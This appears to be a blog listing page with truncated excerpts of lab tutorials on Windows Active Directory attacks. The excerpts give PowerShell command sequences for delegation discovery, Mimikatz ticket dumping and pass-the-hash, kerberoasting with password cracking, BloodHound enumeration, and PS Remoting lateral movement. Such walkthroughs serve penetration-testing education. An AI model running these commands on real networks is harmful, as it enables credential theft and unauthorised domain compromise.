Powershell * POWERSHELL SECURITY

Privesc kerberos

Discover domain computers which have unconstrained delegation enabled using powerview : PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer –Unconstrained Using active directory module : PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer –Unconstrained PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADUser -Filter {trustedfordelegation -eq $true} Run the following command on it to check if anyDA token is available: PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command ‘”sekurlsa::tickets”‘ PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command ‘”sekurlsa::pth /user:administrator…

Powershell * POWERSHELL SECURITY

Domain Privesc

Find user accounts used as service accounts : PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Import-Module .\ActiveDirectory.psd1 PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Get-ADUser -filter {serviceprincipalname -ne “$null”} -Properties serviceprincipalname Check if the TGS has been granted : PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> klist Export all ticket using mimitakz : PS C:\Users\victim.SECURITY\Downloads\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”kerberos::list /export”‘ https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py PS C:\Users\victim.SECURITY\Downloads\kerberoast-master\kerberoast-master> python.exe .\tgsrepcrack.py .\10k-worst-passwords.txt .\2-40a50000-victim@ldap~WIN-2RUMVG5JPOC.security.local~security.local-SECURITY.LOCAL.kirbi…

Powershell * POWERSHELL SECURITY

Domain Enumeration: Bloodhound

https://github.com/BloodHoundAD/BloodHound Supply data to bloodhound : PS C:\Users\victim.SECURITY\Downloads\BloodHound-master\BloodHound-master\Ingestors> Import-Module .\SharpHound.ps1 PS C:\Users\victim.SECURITY\Downloads\BloodHound-master\BloodHound-master\Ingestors> Invoke-BloodHound -CollectionMethod all –Verbose Now download the file https://neo4j.com/download-center/#community extract the file  and go to bin folder PS C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9> cd .\bin\ PS C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9\bin> dir Now on terminal C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9\bin>neo4j.bat install-service C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9\bin>neo4j.bat start Now download https://github.com/BloodHoundAD/BloodHound/releases BloodHound-win32-x64.zip file After extraction double click on BloodHound.exe file….

Powershell * POWERSHELL SECURITY

Lateral Movement PS Remoting

One to one We required admin rights PS shell to perform all this task . PS C:\WINDOWS\system32> Enable-PSRemoting –Force PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> powershell.exe -executionpolicy bypass PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> powershell.exe -nop -exec bypass PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> . .\powercat.ps1 PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> . .\powerview.ps1 PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Find-LocalAdminAccess PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> New-PSSession -ComputerName WIN-2RUMVG5JPOC.security.local PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Enter-PSSession -Id 1 [WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> whoami…